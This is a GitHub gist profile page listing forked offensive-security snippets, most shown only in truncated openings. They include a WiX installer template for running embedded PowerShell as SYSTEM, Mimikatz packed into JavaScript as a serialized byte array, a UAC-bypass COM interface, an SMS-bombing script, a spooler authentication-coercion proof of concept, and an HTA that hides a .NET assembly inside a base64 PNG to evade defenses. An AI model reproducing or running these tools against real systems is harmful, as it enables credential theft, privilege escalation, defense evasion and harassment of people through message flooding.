Skip to content

Instantly share code, notes, and snippets.

View unbaiat's full-sized avatar

unbaiat unbaiat

  • Unicorns United Ltd
  • Castalia
View GitHub Profile
@unbaiat
unbaiat / msigen.wix
Created January 4, 2020 16:17 — forked from xpn/msigen.wix
WIX file with embedded Powershell, which will be executed as SYSTEM
<?xml version="1.0"?>
<Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">
<Product Id="*" UpgradeCode="12345678-1234-1234-1234-111111111111" Name="Example Product Name" Version="0.0.1" Manufacturer="@_xpn_" Language="1033">
<Package InstallerVersion="200" Compressed="yes" Comments="Windows Installer Package"/>
<Media Id="1" Cabinet="product.cab" EmbedCab="yes"/>
<Directory Id="TARGETDIR" Name="SourceDir">
<Directory Id="ProgramFilesFolder">
<Directory Id="INSTALLLOCATION" Name="Example">
<Component Id="ApplicationFiles" Guid="12345678-1234-1234-1234-222222222222">
@unbaiat
unbaiat / tasks.cs
Created January 4, 2020 16:16 — forked from xpn/tasks.cs
Create a .NET Type Dynamically at Runtime, Execute in Script. Prototype DynamicWrapperX , but not posting that publicly
using System;
using System.EnterpriseServices;
using System.Runtime.InteropServices;
using System.Reflection;
using System.Reflection.Emit;
using System.Collections;
using System.Collections.Generic;
@unbaiat
unbaiat / tz.js
Last active December 10, 2019 10:20 — forked from hardw00t/mimikatz.js
Mimikatz.exe in JS
This file has been truncated, but you can view the full file.
var serialized_obj2 = [
0,1,0,0,0,255,255,255,255,1,0,0,0,0,0,0,0,4,1,0,0,0,34,83,121,115,116,101,109,46,68,101,108,
101,103,97,116,101,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,3,0,0,0,8,68,101,108,
101,103,97,116,101,7,116,97,114,103,101,116,48,7,109,101,116,104,111,100,48,3,3,3,48,83,121,115,116,101,109,46,
68,101,108,101,103,97,116,101,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,43,68,101,108,101,
103,97,116,101,69,110,116,114,121,34,83,121,115,116,101,109,46,68,101,108,101,103,97,116,101,83,101,114,105,97,108,105,
122,97,116,105,111,110,72,111,108,100,101,114,47,83,121,115,116,101,109,46,82,101,102,108,101,99,116,105,111,110,46,77,
101,109,98,101,114,73,110,102,111,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,9,2,0,0,
0,9,3,0,0,0,9,4,0,0,0,4,2,0,0,0,48,83,121,115,116,101,109,46,68,101,108,101,103,97,116,101,
@unbaiat
unbaiat / NCryptCreatePersistedKey_virtual_iso.c
Created November 17, 2019 03:31 — forked from gentilkiwi/NCryptCreatePersistedKey_virtual_iso.c
#define NCRYPT_VIRTUAL_ISO_MAYBE 0x10000
#define NCRYPT_VIRTUAL_ISO 0x20000
#define NCRYPT_PER_BOOT_KEY 0x40000
NTSTATUS kuhl_m_standard_test(int argc, wchar_t * argv[])
{
SECURITY_STATUS status;
NCRYPT_PROV_HANDLE hCngProv = 0;
NCRYPT_KEY_HANDLE hCngKey = 0;
DWORD keyLen = 2048;
@unbaiat
unbaiat / akagi_58a.c
Created October 24, 2019 13:43 — forked from hfiref0x/akagi_58a.c
UAC bypass using EditionUpgradeManager COM interface
typedef interface IEditionUpgradeManager IEditionUpgradeManager;
typedef struct IEditionUpgradeManagerVtbl {
BEGIN_INTERFACE
HRESULT(STDMETHODCALLTYPE *QueryInterface)(
__RPC__in IEditionUpgradeManager * This,
__RPC__in REFIID riid,
@unbaiat
unbaiat / sms-bomber.py
Created June 20, 2019 19:14 — forked from BlackVikingPro/sms-bomber.py
SMS Bombing (Spamming) Application! [Python]
#! /usr/bin/env python
import time, smtplib, sys, getpass
# need to define:
"""
e-prov (email-provider) [gmail]|[yahoo]|[custom]
from [attacker email]
from-spoof [spoof attacker email]
to [target email (syntax: [10-digit #]@mms|txt.[provider].com|net|org)]
c [count (# of txt's to send)]
@unbaiat
unbaiat / dementor.py
Created June 14, 2019 05:44 — forked from 3xocyte/dementor.py
rough PoC to connect to spoolss to elicit machine account authentication
#!/usr/bin/env python
# abuse cases and better implementation from the original discoverer: https://github.com/leechristensen/SpoolSample
# some code from https://www.exploit-db.com/exploits/2879/
import os
import sys
import argparse
import binascii
import ConfigParser
@unbaiat
unbaiat / foxyproxy.json
Created June 3, 2019 06:49 — forked from liamosaur/foxyproxy.json
{
"mode": "patterns",
"proxySettings": [
{
"address": "127.0.0.1",
"port": 8080,
"username": "",
"password": "",
"type": 1,
"title": "127.0.0.1:8080",
@unbaiat
unbaiat / honeybadger.hta
Created May 24, 2019 09:36
HoneyBadger PNG - .NET Assembly Bypass
<html>
<img id="HoneyBadger" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAABAAAAAKtCAIAAAA2LYveAAAACXBIWXMAAA7zAAAO8wEcU5k6AAAAEXRFWHRUaXRsZQBQREYgQ3JlYXRvckFevCgAAAATdEVYdEF1dGhvcgBQREYgVG9vbHMgQUcbz3cwAAAALXpUWHREZXNjcmlwdGlvbgAACJnLKCkpsNLXLy8v1ytISdMtyc/PKdZLzs8FAG6fCPGXryy4AAovrklEQVR42ty9i5bjSJIsFgGAZGZWVnX1vFa60tmj/z/6CR19ymp1R3dmerrrkZl8ACFztwiH40kwM6tnJW5PLZMEgXghYO5ubh7/z//jfw8hxOELn1RVFeZedZBvU0r2iX8/ffFs09fSr6qY1o+fXLqz9/yK/3ZdZ+8H/3Yn+9NeK5eIYTfbWfbLfm7dvHQt39tI2ldx8uL5l8Z/cFg5Cfu1MBRz81Kt9W7uPNG3x/d0dl7asDb76/M4bfP0yLbM49Jho3a2C+ttaR0uvTDO/if9RLcd3nT6Gk3c7Hl27vM4eT9dnzzlaApWzhAXzs8/67qu9GVfHbt73Nl1HSv8l7q2O3btpW3P6A5WirShi2WkZQdomtPsDdK27agB/PZY53VbxUav3OjVK/7ZNHv8o8s+H3Zpa54BDcA5bXnjYH9z8b1OyvPlcsF7fti2id3UraPe6atpGn6FI4/P3/EnD8D5tUfywq9affFU1oUmHvNC0hdbUsurmV9XOhQ8Unpdc6m0bD+6Jf/Grp/xC4elYpfxwsHlXN1wPejnqSlLBWfBDFW4QVOsOu7DEbPI3kXsPDjb8dxyQPDv+Xw+nS7YsXe7g05nbJrdfr9v6n3u/uXy9PKNS/3u7u5wOKCvGDR88/z8HEOtUyYvncQaDau6c3kSVFxdsmGkqk3dk77w+ePj44cPH5qd7JzpdNQ+5hfOjFbhX1xOxrSRUcUnuNzxeMSlcSg+5ySi
@unbaiat
unbaiat / doc.open.alipay.com-vulnerable-js-searchList-v2.js
Created April 15, 2019 07:41 — forked from Voorivex/doc.open.alipay.com-vulnerable-js-searchList-v2.js
function h(b, e) {
url = d.one(".J_ajaxUrl").val();
var f = "keyword=" + (d.one(".J_Tagword") ? d.one(".J_Tagword").val() : d.one(".J_SearchKeyword").val()) + "&searchType=" + e;
url.indexOf("?") > 0 ? url += "&" : url += "?",
c({
url: url + f + "&current=" + b,
type: "post",
dataType: "json",
data: {},
success: function(b) {